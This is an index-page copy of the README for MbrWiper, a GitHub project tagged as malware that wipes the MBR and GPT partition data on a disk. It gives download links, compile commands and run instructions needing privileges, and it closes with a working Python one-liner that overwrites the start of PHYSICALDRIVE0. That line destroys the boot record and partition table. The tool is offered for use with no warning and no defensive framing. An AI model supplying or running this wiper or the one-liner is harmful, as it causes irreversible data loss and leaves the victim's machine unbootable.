An open API service indexing awesome lists of open source software.

https://github.com/mauricelambert/mbrwiper

This repository implements a little MBR and GPT Wiper.
https://github.com/mauricelambert/mbrwiper

diskkill dos gpt gptwiper malware mbr mbrwiper

Last synced: 3 months ago
JSON representation

This repository implements a little MBR and GPT Wiper.

Awesome Lists containing this project

README

          

![MbrWiper Logo](https://mauricelambert.github.io/info/c/security/MbrWiper_small.png "MbrWiper logo")

# MbrWiper

## Description

This file implements a little MBR and GPT Wiper.

## Requirements

- No requirements

## Download

[Download binaries (Linux and Windows Libraries and examples) from latest github release](https://github.com/mauricelambert/MbrWiper/releases/latest).

## Compile

### Download sources

```bash
git clone https://github.com/mauricelambert/MbrWiper.git
cd MbrWiper
```

#### Windows

```bash
gcc -Wall -Wextra -Werror -O5 MbrWiper.c -o MbrWiper.exe
strip MbrWiper
```

#### Linux

```bash
gcc -Wall -Wextra -Werror -O5 MbrWiper.c -o MbrWiper
strip MbrWiper
```

## Usages

**Privileges required**

### Linux

```bash
./MbrWiper
```

### Windows

```bash
MbrWiper.exe
```

## MBR and GPT Wiper in python oneliner

```python
open("\\\\.\\PHYSICALDRIVE0", "rb+").write(b"a" * 1024)
```

## Links

- [Github](https://github.com/mauricelambert/MbrWiper/)
- [Github - compiled executable](https://github.com/mauricelambert/MbrWiper/releases/latest/)
- [SourceForce - compiled executable](https://sourceforge.net/projects/MbrWiper/files/)

## Licence

Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).